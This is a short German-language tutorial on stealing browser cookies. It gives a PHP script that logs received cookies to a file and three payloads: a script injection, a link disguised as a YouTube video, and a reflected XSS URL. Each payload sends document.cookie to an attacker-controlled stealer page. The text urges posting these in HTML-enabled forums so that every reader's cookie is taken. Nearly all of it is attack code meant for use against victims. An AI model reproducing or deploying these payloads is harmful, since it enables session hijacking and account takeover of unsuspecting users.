Was brauchen wir ?
– FTP
– Php Script
Index.php
<?php $cookie = $HTTP_GET_VARS[„cookie“]; $file = fopen(‚log.txt‘, ‚a‘); fwrite($file, $cookie . „\n\n“); ?> |
Die Index.php im FTP abspeichern!
Den Link jetzt rumschicken, am besten in Foren die HTML erlauben
<script language=“Javascript“> document.location=“http://www.seitezumstealer.de/stealer.php?cookie=“ + document.cookie; </script> |
Somit wird jeder cookie gestealt , der deinen Post liest.
ODER:
<a href=“java script:document.location=’www.seitezumstealer.de/stealer.php?cookie=’+document.cookie;“>Klick hier für das YouTube Video</a> |
Hier wird der Cookie erst gestealt nachdem das Opfer auf „Klick hier für das YouTube Video“ klickt
ODER PER XSS:
http://www.seite.de/index.php?id=<script>document.location=“http://www.seitezumstealer/stealer.php?cookie=“ + document.cookie;</script>